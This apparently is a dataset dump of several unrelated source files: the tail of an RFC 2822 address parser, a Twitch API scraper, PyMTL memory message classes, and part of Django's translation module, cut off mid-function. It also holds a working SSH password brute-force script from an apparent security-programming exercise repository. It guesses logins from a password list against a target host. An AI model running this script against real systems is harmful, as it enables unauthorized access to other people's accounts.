returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos += 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos += 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = False
self.pos += 1
self.gotonext()
adlist = ''
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = False
elif self.field[self.pos] == '>':
self.pos += 1
break
elif self.field[self.pos] == '@':
self.pos += 1
expectroute = True
elif self.field[self.pos] == ':':
self.pos += 1
else:
adlist = self.getaddrspec()
self.pos += 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC 2822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
if self.field[self.pos] == '.':
aslist.append('.')
self.pos += 1
elif self.field[self.pos] == '"':
aslist.append('"%s"' % self.getquote())
elif self.field[self.pos] in self.atomends:
break
else:
aslist.append(self.getatom())
self.gotonext()
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return EMPTYSTRING.join(aslist)
aslist.append('@')
self.pos += 1
self.gotonext()
return EMPTYSTRING.join(aslist) + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos += 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else:
sdlist.append(self.getatom())
return EMPTYSTRING.join(sdlist)
def getdelimited(self, beginchar, endchars, allowcomments=True):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = False
self.pos += 1
while self.pos < len(self.field):
if quote:
slist.append(self.field[self.pos])
quote = False
elif self.field[self.pos] in endchars:
self.pos += 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
continue # have already advanced pos from getcomment
elif self.field[self.pos] == '\\':
quote = True
else:
slist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(slist)
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', False)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', True)
def getdomainliteral(self):
"""Parse an RFC 2822 domain-literal."""
return '[%s]' % self.getdelimited('[', ']\r', False)
def getatom(self, atomends=None):
"""Parse an RFC 2822 atom.
Optional atomends specifies a different set of end token delimiters
(the default is to use self.atomends). This is used e.g. in
getphraselist() since phrase endings must not include the `.' (which
is legal in phrases)."""
atomlist = ['']
if atomends is None:
atomends = self.atomends
while self.pos < len(self.field):
if self.field[self.pos] in atomends:
break
else:
atomlist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(atomlist)
def getphraselist(self):
"""Parse a sequence of RFC 2822 phrases.
A phrase is a sequence of words, which are in turn either RFC 2822
atoms or quoted-strings. Phrases are canonicalized by squeezing all
runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.FWS:
self.pos += 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.phraseends:
break
else:
plist.append(self.getatom(self.phraseends))
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __iadd__(self, other):
# Set union, in-place
for x in other.addresslist:
if not x in self.addresslist:
self.addresslist.append(x)
return self
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __isub__(self, other):
# Set difference, in-place
for x in other.addresslist:
if x in self.addresslist:
self.addresslist.remove(x)
return self
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addresslist[index]
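# A minimal sketch of the (deprecated) parser interface; the addresses are
# placeholders:
def _example_parse_addresses():
    addrs = AddressList('Jane <jane@example.com>, bob@example.org')
    # addresslist holds (display-name, addr-spec) pairs, here
    # [('Jane', 'jane@example.com'), ('', 'bob@example.org')]
    return addrs.addresslist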
|
apache-2.0
|
AM-SL/python-codes
|
Python-Chaptering/Chapter-2/3-sshBrute.py
|
2
|
1854
|
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-H <target host> -u <user> -F <password list>'
)
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-F', dest='passwdFile', type='string',\
help='specify password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args=(host, user,\
password, True))
t.start()
if __name__ == '__main__':
main()
|
mit
|
MrSprigster/script.module.python.twitch
|
resources/lib/twitch/scraper.py
|
1
|
4491
|
# -*- encoding: utf-8 -*-
"""
Copyright (C) 2012-2016 python-twitch (https://github.com/ingwinlu/python-twitch)
Copyright (C) 2016-2018 script.module.python.twitch
This file is part of script.module.python.twitch
SPDX-License-Identifier: GPL-3.0-only
See LICENSES/GPL-3.0-only for more information.
"""
import sys
import requests
from six.moves.urllib.error import URLError
from six.moves.urllib.parse import quote_plus # NOQA
from six.moves.urllib.parse import urlencode
from .keys import USER_AGENT, USER_AGENT_STRING
from .log import log
from .exceptions import ResourceUnavailableException
from . import methods
try:
import json
except:
import simplejson as json # @UnresolvedImport
SSL_VERIFICATION = True
if sys.version_info <= (2, 7, 9):
SSL_VERIFICATION = False
MAX_RETRIES = 5
def get_json(baseurl, parameters={}, headers={}, data={}, method=methods.GET):
'''Download data from a URL and return it as JSON
@param url Url to download from
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@returns JSON Object with data from URL
'''
method = methods.validate(method)
jsonString = download(baseurl, parameters, headers, data, method)
jsonDict = json.loads(jsonString)
log.debug('url: |{0}| parameters: |{1}|\n{2}'.format(baseurl, parameters, json.dumps(jsonDict, indent=4, sort_keys=True)))
return jsonDict
def get_json_and_headers(baseurl, parameters={}, headers={}, data={}, method=methods.GET):
'''Download data from a URL and return it as JSON
@param url Url to download from
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@returns JSON Object with data and headers from URL {'response': {}, 'headers': {}}
'''
method = methods.validate(method)
content = download(baseurl, parameters, headers, data, method, response_headers=True)
content['response'] = json.loads(content['response'])
log.debug('url: |{0}| parameters: |{1}|\n{2}'.format(baseurl, parameters, json.dumps(content['response'], indent=4, sort_keys=True)))
return content
def download(baseurl, parameters={}, headers={}, data={}, method=methods.GET, response_headers=False):
'''Download data from a URL and return it as a string
@param baseurl Url to download from (e.g. http://www.google.com)
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@param response_headers Include response headers in response {'response': {}, 'headers': {}}
@returns String of data from URL or {'response': {}, 'headers': {}} if response_headers is True
'''
method = methods.validate(method)
if not parameters:
url = baseurl
elif isinstance(parameters, dict):
url = '?'.join([baseurl, urlencode(parameters)])
else:
_parameters = ''
for param in parameters:
_parameters += '{0}={1}&'.format(param[0], quote_plus(str(param[1])))
_parameters = _parameters.rstrip('&')
url = '?'.join([baseurl, _parameters])
log.debug('Downloading: |{0}|'.format(url))
content = ""
for _ in range(MAX_RETRIES):
try:
headers.update({USER_AGENT: USER_AGENT_STRING})
response = requests.request(method=method, url=url, headers=headers, data=data, verify=SSL_VERIFICATION)
content = response.content
if not content:
content = '{{"status": {0}}}'.format(response.status_code)
break
except Exception as err:
if not isinstance(err, URLError):
log.debug('Error |{0}| during HTTP Request, abort'.format(repr(err)))
raise # propagate non-URLError
log.debug('Error |{0}| during HTTP Request, retrying'.format(repr(err)))
else:
raise ResourceUnavailableException('Max retries exceeded')
if isinstance(content, bytes):
content = content.decode('utf-8')
if not response_headers:
return content
else:
return {'response': content, 'headers': response.headers}
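# A minimal usage sketch, assuming network access; the URL and parameters are
# placeholders rather than a real endpoint.
def _example_fetch_json():
    # get_json() encodes the parameters into the URL, retries up to
    # MAX_RETRIES times and decodes the response body as JSON.
    return get_json('https://example.com/api', parameters={'limit': 10})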
|
gpl-3.0
|
jjffryan/pymtl
|
pclib/ifcs/MemMsg.py
|
7
|
5823
|
#=========================================================================
# MemMsg
#=========================================================================
# Contains memory request and response messages.
from pymtl import *
import math
#-------------------------------------------------------------------------
# MemReqMsg
#-------------------------------------------------------------------------
# Memory request messages can either be for a read or write. Read
# requests include an address and the number of bytes to read, while
# write requests include an address, the number of bytes to write, and
# the actual data to write.
#
# Message Format:
#
# 1b addr_nbits calc data_nbits
# +------+-----------+------+-----------+
# | type | addr | len | data |
# +------+-----------+------+-----------+
#
# The message type is parameterized by the number of address and data
# bits. Note that the size of the length field is caclulated from the
# number of bits in the data field, and that the length field is
# expressed in _bytes_. If the value of the length field is zero, then
# the read or write should be for the full width of the data field.
#
# For example, if the address size is 32 bits and the data size is also
# 32 bits, then the message format is as follows:
#
# 66 66 65 34 33 32 31 0
# +------+-----------+------+-----------+
# | type | addr | len | data |
# +------+-----------+------+-----------+
#
# The length field is two bits. A length value of one means read or write
# a single byte, a length value of two means read or write two bytes, and
# so on. A length value of zero means read or write all four bytes. Note
# that not all memories will necessarily support any alignment and/or any
# value for the length field.
class MemReqMsg( BitStructDefinition ):
TYPE_READ = 0
TYPE_WRITE = 1
def __init__( s, addr_nbits, data_nbits ):
s.type_nbits = 1
s.addr_nbits = addr_nbits
s.len_nbits = int( math.ceil( math.log( data_nbits/8, 2) ) )
s.data_nbits = data_nbits
s.type_ = BitField( s.type_nbits )
s.addr = BitField( s.addr_nbits )
s.len = BitField( s.len_nbits )
s.data = BitField( s.data_nbits )
def mk_msg( s, type_, addr, len_, data ):
msg = s()
msg.type_ = type_
msg.addr = addr
msg.len = len_
msg.data = data
return msg
def mk_rd( s, addr, len_ ):
msg = s()
msg.type_ = MemReqMsg.TYPE_READ
msg.addr = addr
msg.len = len_
msg.data = 0
return msg
def mk_wr( s, addr, len_, data ):
msg = s()
msg.type_ = MemReqMsg.TYPE_WRITE
msg.addr = addr
msg.len = len_
msg.data = data
return msg
def __str__( s ):
if s.type_ == MemReqMsg.TYPE_READ:
return "rd:{}:{}".format( s.addr, ' '*(s.data.nbits/4) )
elif s.type_ == MemReqMsg.TYPE_WRITE:
return "wr:{}:{}".format( s.addr, s.data )
#-------------------------------------------------------------------------
# MemRespMsg
#-------------------------------------------------------------------------
# Memory response messages can either be for a read or write. Read
# responses include the actual data and the number of bytes, while write
# responses currently include nothing other than the type.
#
# Message Format:
#
# 1b calc data_nbits
# +------+------+-----------+
# | type | len | data |
# +------+------+-----------+
#
# The message type is parameterized by the number of address and data
# bits. Note that the size of the length field is calculated from the
# number of bits in the data field, and that the length field is
# expressed in _bytes_. If the value of the length field is zero, then
# the read or write should be for the full width of the data field.
#
# For example, if the address size is 32 bits and the data size is also
# 32 bits, then the message format is as follows:
#
# 34 34 33 32 31 0
# +------+------+-----------+
# | type | len | data |
# +------+------+-----------+
#
# The length field is two bits. A length value of one means a single byte
# of read data is valid, a length value of two means two bytes of read
# data is valid, and so on. A length value of zero means all four bytes
# of the read data is valid. Note that not all memories will necessarily
# support any alignment and/or any value for the length field.
class MemRespMsg( BitStructDefinition ):
TYPE_READ = 0
TYPE_WRITE = 1
def __init__( s, data_nbits ):
s.type_nbits = 1
s.len_nbits = int( math.ceil( math.log( data_nbits/8, 2 ) ) )
s.data_nbits = data_nbits
s.type_ = BitField( s.type_nbits )
s.len = BitField( s.len_nbits )
s.data = BitField( s.data_nbits )
def mk_msg( s, type_, len_, data ):
msg = s()
msg.type_ = type_
msg.len = len_
msg.data = data
return msg
# What exactly is this method for? -cbatten
def unpck( s, msg ):
resp = s()
resp.value = msg
return resp
def __str__( s ):
if s.type_ == MemRespMsg.TYPE_READ:
return "rd:{}".format( s.data )
elif s.type_ == MemRespMsg.TYPE_WRITE:
return "wr:{}".format( ' '*(s.data.nbits/4) )
#-------------------------------------------------------------------------
# MemMsg
#-------------------------------------------------------------------------
# Single class that contains both the memory request and response types.
# This simplifies parameterizing models with both message types since (1)
# we can specify the address and data nbits in a single step, and (2) we
# can pass a single object into the parameterized model.
class MemMsg( object ):
def __init__( s, addr_nbits, data_nbits ):
s.req = MemReqMsg ( addr_nbits, data_nbits )
s.resp = MemRespMsg( data_nbits )
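# A minimal usage sketch for the container above; the 32-bit address and data
# widths and the addresses/data are arbitrary example values.
def _example_mem_msgs():
    mem_ifc = MemMsg( 32, 32 )
    # len_ == 0 requests the full data width, per the format notes above.
    rd = mem_ifc.req.mk_rd( 0x1000, 0 )
    wr = mem_ifc.req.mk_wr( 0x1004, 0, 0xdeadbeef )
    return rd, wr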
|
bsd-3-clause
|
mcsosa121/cafa
|
cafaenv/lib/python2.7/site-packages/django/utils/translation/trans_real.py
|
35
|
28112
|
"""Translation helper functions."""
from __future__ import unicode_literals
import gettext as gettext_module
import os
import re
import sys
import warnings
from collections import OrderedDict
from threading import local
from django.apps import apps
from django.conf import settings
from django.conf.locale import LANG_INFO
from django.core.exceptions import AppRegistryNotReady
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache, six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.safestring import SafeData, mark_safe
from django.utils.six import StringIO
from django.utils.translation import (
LANGUAGE_SESSION_KEY, TranslatorCommentWarning, trim_whitespace,
)
# Translations are cached in a dictionary for every language.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = local()
# The default translation is based on the settings file.
_default = None
# magic gettext number to separate context from message
CONTEXT_SEPARATOR = "\x04"
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9
# and RFC 3066, section 2.1
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*|\*) # "en", "en-au", "x-y-z", "es-419", "*"
(?:\s*;\s*q=(0(?:\.\d{,3})?|1(?:\.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
language_code_re = re.compile(
r'^[a-z]{1,8}(?:-[a-z0-9]{1,8})*(?:@[a-z0-9]{1,20})?$',
re.IGNORECASE
)
language_code_prefix_re = re.compile(r'^/([\w@-]+)(/|$)')
@receiver(setting_changed)
def reset_cache(**kwargs):
"""
Reset global state when LANGUAGES setting has been changed, as some
languages should no longer be accepted.
"""
if kwargs['setting'] in ('LANGUAGES', 'LANGUAGE_CODE'):
check_for_language.cache_clear()
get_languages.cache_clear()
get_supported_language_variant.cache_clear()
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower() + '_' + language[p + 1:].lower()
else:
# Get correct locale for sr-latn
if len(language[p + 1:]) > 2:
return language[:p].lower() + '_' + language[p + 1].upper() + language[p + 2:].lower()
return language[:p].lower() + '_' + language[p + 1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower() + '-' + locale[p + 1:].lower()
else:
return locale.lower()
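# For example: to_locale('en-us') -> 'en_US', to_locale('sr-latn') -> 'sr_Latn',
# and to_language('en_US') -> 'en-us'.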
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct an object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
def __init__(self, language):
"""Create a GNUTranslations() using many locale directories"""
gettext_module.GNUTranslations.__init__(self)
self.set_output_charset('utf-8') # For Python 2 gettext() (#25720)
self.__language = language
self.__to_language = to_language(language)
self.__locale = to_locale(language)
self._init_translation_catalog()
self._add_installed_apps_translations()
self._add_local_translations()
self._add_fallback()
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
def _new_gnu_trans(self, localedir, use_null_fallback=True):
"""
Returns a mergeable gettext.GNUTranslations instance.
A convenience wrapper. By default gettext uses 'fallback=False'.
Using param `use_null_fallback` to avoid confusion with any other
references to 'fallback'.
"""
translation = gettext_module.translation(
domain='django',
localedir=localedir,
languages=[self.__locale],
codeset='utf-8',
fallback=use_null_fallback)
if not hasattr(translation, '_catalog'):
# provides merge support for NullTranslations()
translation._catalog = {}
translation._info = {}
translation.plural = lambda n: int(n != 1)
return translation
def _init_translation_catalog(self):
"""Creates a base catalog using global django translations."""
settingsfile = upath(sys.modules[settings.__module__].__file__)
localedir = os.path.join(os.path.dirname(settingsfile), 'locale')
use_null_fallback = True
if self.__language == settings.LANGUAGE_CODE:
# default lang should be present and parseable, if not
# gettext will raise an IOError (refs #18192).
use_null_fallback = False
translation = self._new_gnu_trans(localedir, use_null_fallback)
self.plural = translation.plural
self._info = translation._info.copy()
self._catalog = translation._catalog.copy()
def _add_installed_apps_translations(self):
"""Merges translations from each installed app."""
try:
app_configs = reversed(list(apps.get_app_configs()))
except AppRegistryNotReady:
raise AppRegistryNotReady(
"The translation infrastructure cannot be initialized before the "
"apps registry is ready. Check that you don't make non-lazy "
"gettext calls at import time.")
for app_config in app_configs:
localedir = os.path.join(app_config.path, 'locale')
translation = self._new_gnu_trans(localedir)
self.merge(translation)
def _add_local_translations(self):
"""Merges translations defined in LOCALE_PATHS."""
for localedir in reversed(settings.LOCALE_PATHS):
translation = self._new_gnu_trans(localedir)
self.merge(translation)
def _add_fallback(self):
"""Sets the GNUTranslations() fallback with the default language."""
# Don't set a fallback for the default language or any English variant
# (as it's empty, so it'll ALWAYS fall back to the default language)
if self.__language == settings.LANGUAGE_CODE or self.__language.startswith('en'):
return
default_translation = translation(settings.LANGUAGE_CODE)
self.add_fallback(default_translation)
def merge(self, other):
"""Merge another translation into this catalog."""
self._catalog.update(other._catalog)
def language(self):
"""Returns the translation language."""
return self.__language
def to_language(self):
"""Returns the translation language name."""
return self.__to_language
def translation(language):
"""
Returns a translation object.
"""
global _translations
if language not in _translations:
_translations[language] = DjangoTranslation(language)
return _translations[language]
def activate(language):
"""
Fetches the translation object for a given language and installs it as the
current translation object for the current thread.
"""
if not language:
return
_active.value = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
if hasattr(_active, "value"):
del _active.value
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active.value = gettext_module.NullTranslations()
_active.value.to_language = lambda *args: None
def get_language():
"""Returns the currently selected language."""
t = getattr(_active, "value", None)
if t is not None:
try:
return t.to_language()
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
* False = left-to-right layout
* True = right-to-left layout
"""
lang = get_language()
if lang is None:
return False
else:
base_lang = get_language().split('-')[0]
return base_lang in settings.LANGUAGES_BIDI
def catalog():
"""
Returns the current active catalog for further processing.
This can be used if you need to modify the catalog or want to access the
whole message catalog instead of just translating one string.
"""
global _default
t = getattr(_active, "value", None)
if t is not None:
return t
if _default is None:
_default = translation(settings.LANGUAGE_CODE)
return _default
def do_translate(message, translation_function):
"""
Translates 'message' using the given 'translation_function' name -- which
will be either gettext or ugettext. It uses the current thread to find the
translation object to use. If no current translation is activated, the
message will be run through the default translation object.
"""
global _default
# str() is allowing a bytestring message to remain bytestring on Python 2
eol_message = message.replace(str('\r\n'), str('\n')).replace(str('\r'), str('\n'))
if len(eol_message) == 0:
# Returns an empty value of the corresponding type if an empty message
# is given, instead of metadata, which is the default gettext behavior.
result = type(message)("")
else:
_default = _default or translation(settings.LANGUAGE_CODE)
translation_object = getattr(_active, "value", _default)
result = getattr(translation_object, translation_function)(eol_message)
if isinstance(message, SafeData):
return mark_safe(result)
return result
def gettext(message):
"""
Returns a string of the translation of the message.
Returns a string on Python 3 and an UTF-8-encoded bytestring on Python 2.
"""
return do_translate(message, 'gettext')
if six.PY3:
ugettext = gettext
else:
def ugettext(message):
return do_translate(message, 'ugettext')
def pgettext(context, message):
msg_with_ctxt = "%s%s%s" % (context, CONTEXT_SEPARATOR, message)
result = ugettext(msg_with_ctxt)
if CONTEXT_SEPARATOR in result:
# Translation not found
# force unicode, because lazy version expects unicode
result = force_text(message)
return result
def gettext_noop(message):
"""
Marks strings for translation but doesn't translate them now. This can be
used to store strings in global variables that should stay in the base
language (because they might be used externally) and will be translated
later.
"""
return message
def do_ntranslate(singular, plural, number, translation_function):
global _default
t = getattr(_active, "value", None)
if t is not None:
return getattr(t, translation_function)(singular, plural, number)
if _default is None:
_default = translation(settings.LANGUAGE_CODE)
return getattr(_default, translation_function)(singular, plural, number)
def ngettext(singular, plural, number):
"""
Returns a string of the translation of either the singular or plural,
based on the number.
Returns a string on Python 3 and an UTF-8-encoded bytestring on Python 2.
"""
return do_ntranslate(singular, plural, number, 'ngettext')
if six.PY3:
ungettext = ngettext
else:
def ungettext(singular, plural, number):
"""
Returns a unicode strings of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ungettext')
def npgettext(context, singular, plural, number):
msgs_with_ctxt = ("%s%s%s" % (context, CONTEXT_SEPARATOR, singular),
"%s%s%s" % (context, CONTEXT_SEPARATOR, plural),
number)
result = ungettext(*msgs_with_ctxt)
if CONTEXT_SEPARATOR in result:
# Translation not found
result = ungettext(singular, plural, number)
return result
def all_locale_paths():
"""
Returns a list of paths to user-provided language files.
"""
globalpath = os.path.join(
os.path.dirname(upath(sys.modules[settings.__module__].__file__)), 'locale')
return [globalpath] + list(settings.LOCALE_PATHS)
@lru_cache.lru_cache(maxsize=1000)
def check_for_language(lang_code):
"""
Checks whether there is a global language file for the given language
code. This is used to decide whether a user-provided language is
available.
lru_cache should have a maxsize to prevent memory exhaustion attacks,
as the provided language codes are taken from the HTTP request. See also
<https://www.djangoproject.com/weblog/2007/oct/26/security-fix/>.
"""
# First, a quick check to make sure lang_code is well-formed (#21458)
if lang_code is None or not language_code_re.search(lang_code):
return False
for path in all_locale_paths():
if gettext_module.find('django', path, [to_locale(lang_code)]) is not None:
return True
return False
@lru_cache.lru_cache()
def get_languages():
"""
Cache of settings.LANGUAGES in an OrderedDict for easy lookups by key.
"""
return OrderedDict(settings.LANGUAGES)
@lru_cache.lru_cache(maxsize=1000)
def get_supported_language_variant(lang_code, strict=False):
"""
Returns the language-code that's listed in supported languages, possibly
selecting a more generic variant. Raises LookupError if nothing is found.
If `strict` is False (the default), the function will look for an alternative
country-specific variant when the one currently checked is not found.
lru_cache should have a maxsize to prevent memory exhaustion attacks,
as the provided language codes are taken from the HTTP request. See also
<https://www.djangoproject.com/weblog/2007/oct/26/security-fix/>.
"""
if lang_code:
# If 'fr-ca' is not supported, try special fallback or language-only 'fr'.
possible_lang_codes = [lang_code]
try:
possible_lang_codes.extend(LANG_INFO[lang_code]['fallback'])
except KeyError:
pass
generic_lang_code = lang_code.split('-')[0]
possible_lang_codes.append(generic_lang_code)
supported_lang_codes = get_languages()
for code in possible_lang_codes:
if code in supported_lang_codes and check_for_language(code):
return code
if not strict:
# if fr-fr is not supported, try fr-ca.
for supported_code in supported_lang_codes:
if supported_code.startswith(generic_lang_code + '-'):
return supported_code
raise LookupError(lang_code)
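# Hedged usage sketch (assumes settings.LANGUAGES lists 'fr' but not 'fr-ca',
# and that the 'fr' locale files are available):
#
#   get_supported_language_variant('fr-ca')   # -> 'fr'
#   get_supported_language_variant('xx')      # raises LookupError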
def get_language_from_path(path, strict=False):
"""
Returns the language-code if there is a valid language-code
found in the `path`.
If `strict` is False (the default), the function will look for an alternative
country-specific variant when the one currently checked is not found.
"""
regex_match = language_code_prefix_re.match(path)
if not regex_match:
return None
lang_code = regex_match.group(1)
try:
return get_supported_language_variant(lang_code, strict=strict)
except LookupError:
return None
def get_language_from_request(request, check_path=False):
"""
Analyzes the request to find what language the user wants the system to
show. Only languages listed in settings.LANGUAGES are taken into account.
If the user requests a sublanguage where we have a main language, we send
out the main language.
If check_path is True, the URL path prefix will be checked for a language
code, otherwise this is skipped for backwards compatibility.
"""
if check_path:
lang_code = get_language_from_path(request.path_info)
if lang_code is not None:
return lang_code
supported_lang_codes = get_languages()
if hasattr(request, 'session'):
lang_code = request.session.get(LANGUAGE_SESSION_KEY)
if lang_code in supported_lang_codes and lang_code is not None and check_for_language(lang_code):
return lang_code
lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
try:
return get_supported_language_variant(lang_code)
except LookupError:
pass
accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
if not language_code_re.search(accept_lang):
continue
try:
return get_supported_language_variant(accept_lang)
except LookupError:
continue
try:
return get_supported_language_variant(settings.LANGUAGE_CODE)
except LookupError:
return settings.LANGUAGE_CODE
dot_re = re.compile(r'\S')
def blankout(src, char):
"""
Changes every non-whitespace character to the given char.
Used in the templatize function.
"""
return dot_re.sub(char, src)
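# Illustrative, self-contained sketch of what blankout() does (the _demo_*
# names are not part of the original module): every non-whitespace character
# becomes the given char while whitespace and newlines are preserved, so the
# templatized output keeps its original layout.
import re as _demo_re

def _demo_blankout(src, char):
    return _demo_re.sub(r'\S', char, src)

assert _demo_blankout("hello  world\n", "X") == "XXXXX  XXXXX\n"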
context_re = re.compile(r"""^\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?'))\s*""")
inline_re = re.compile(
# Match the trans 'some text' part
r"""^\s*trans\s+((?:"[^"]*?")|(?:'[^']*?'))"""
# Match and ignore optional filters
r"""(?:\s*\|\s*[^\s:]+(?::(?:[^\s'":]+|(?:"[^"]*?")|(?:'[^']*?')))?)*"""
# Match the optional context part
r"""(\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?')))?\s*"""
)
block_re = re.compile(r"""^\s*blocktrans(\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?')))?(?:\s+|$)""")
endblock_re = re.compile(r"""^\s*endblocktrans$""")
plural_re = re.compile(r"""^\s*plural$""")
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")
def templatize(src, origin=None):
"""
Turns a Django template into something that is understood by xgettext. It
does so by translating the Django translation tags into standard gettext
function invocations.
"""
from django.template.base import (Lexer, TOKEN_TEXT, TOKEN_VAR,
TOKEN_BLOCK, TOKEN_COMMENT, TRANSLATOR_COMMENT_MARK)
src = force_text(src, settings.FILE_CHARSET)
out = StringIO('')
message_context = None
intrans = False
inplural = False
trimmed = False
singular = []
plural = []
incomment = False
comment = []
lineno_comment_map = {}
comment_lineno_cache = None
def join_tokens(tokens, trim=False):
message = ''.join(tokens)
if trim:
message = trim_whitespace(message)
return message
for t in Lexer(src).tokenize():
if incomment:
if t.token_type == TOKEN_BLOCK and t.contents == 'endcomment':
content = ''.join(comment)
translators_comment_start = None
for lineno, line in enumerate(content.splitlines(True)):
if line.lstrip().startswith(TRANSLATOR_COMMENT_MARK):
translators_comment_start = lineno
for lineno, line in enumerate(content.splitlines(True)):
if translators_comment_start is not None and lineno >= translators_comment_start:
out.write(' # %s' % line)
else:
out.write(' #\n')
incomment = False
comment = []
else:
comment.append(t.contents)
elif intrans:
if t.token_type == TOKEN_BLOCK:
endbmatch = endblock_re.match(t.contents)
pluralmatch = plural_re.match(t.contents)
if endbmatch:
if inplural:
if message_context:
out.write(' npgettext(%r, %r, %r,count) ' % (
message_context,
join_tokens(singular, trimmed),
join_tokens(plural, trimmed)))
else:
out.write(' ngettext(%r, %r, count) ' % (
join_tokens(singular, trimmed),
join_tokens(plural, trimmed)))
for part in singular:
out.write(blankout(part, 'S'))
for part in plural:
out.write(blankout(part, 'P'))
else:
if message_context:
out.write(' pgettext(%r, %r) ' % (
message_context,
join_tokens(singular, trimmed)))
else:
out.write(' gettext(%r) ' % join_tokens(singular,
trimmed))
for part in singular:
out.write(blankout(part, 'S'))
message_context = None
intrans = False
inplural = False
singular = []
plural = []
elif pluralmatch:
inplural = True
else:
